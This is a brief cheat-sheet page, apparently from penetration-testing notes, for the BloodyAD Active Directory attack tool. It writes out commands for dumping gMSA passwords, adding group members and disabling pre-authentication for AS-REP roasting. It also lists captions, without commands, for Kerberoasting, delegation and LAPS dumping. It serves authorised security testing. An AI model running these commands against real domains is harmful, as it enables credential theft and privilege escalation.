githubEdit

BloodyAD

Guide: https://github.com/CravateRouge/bloodyAD/wiki/User-Guide

Usage:

1)

bloodyAD --host dc01.DOMAIN.COM -d "DOMAIN.COM" --dc-ip DC_IP -k get object 'GMSA01$' --attr msDS-ManagedPassword

(Dump GMSA Password)

2)

bloodyAD --host dc01.DOMAIN.COM -d "DOMAIN.COM" --dc-ip DC_IP -k add groupMember "TARGET_GROUP" "USER_TO_ADD"

(Add a user to a group)

3)

bloodyAD --host dc01.DOMAIN.COM -d "DOMAIN.COM" --dc-ip DC_IP -k add uac TARGET_USER -f DONT_REQ_PREAUTH

(Disable pre-authentication on a user to do ASREPRoasting attack)

4)

bloodyAD --host dc01.DOMAIN.COM -d "DOMAIN.COM" --dc-ip DC_IP -k remove uac TARGET_USER -f ACCOUNTDISABLE

(Enable accounts)

5)

(Set a fake SPN for an account to do Constrained Delegation attack)

6)

(Get Kerberoastable accounts)

7)

(Get account that do not require Kerberos pre-authentication (AS-REP))

8)

(Check if ADIDNS has a wildcard entry (if not, check ADIDNS spoofing))

9)

(Get all DNS Records from AD)

10)

(Get Machine Account Quota (MAQ) to do an RBCD attack if the num is 10)

11)

(Get all users)

12)

(Get all computers)

13)

(Get all containers)

14)

(Get all trusts)

15)

(Get min Password Length)

16)

(Get AD Forest level)

17)

(Dump LAPS Password)

Last updated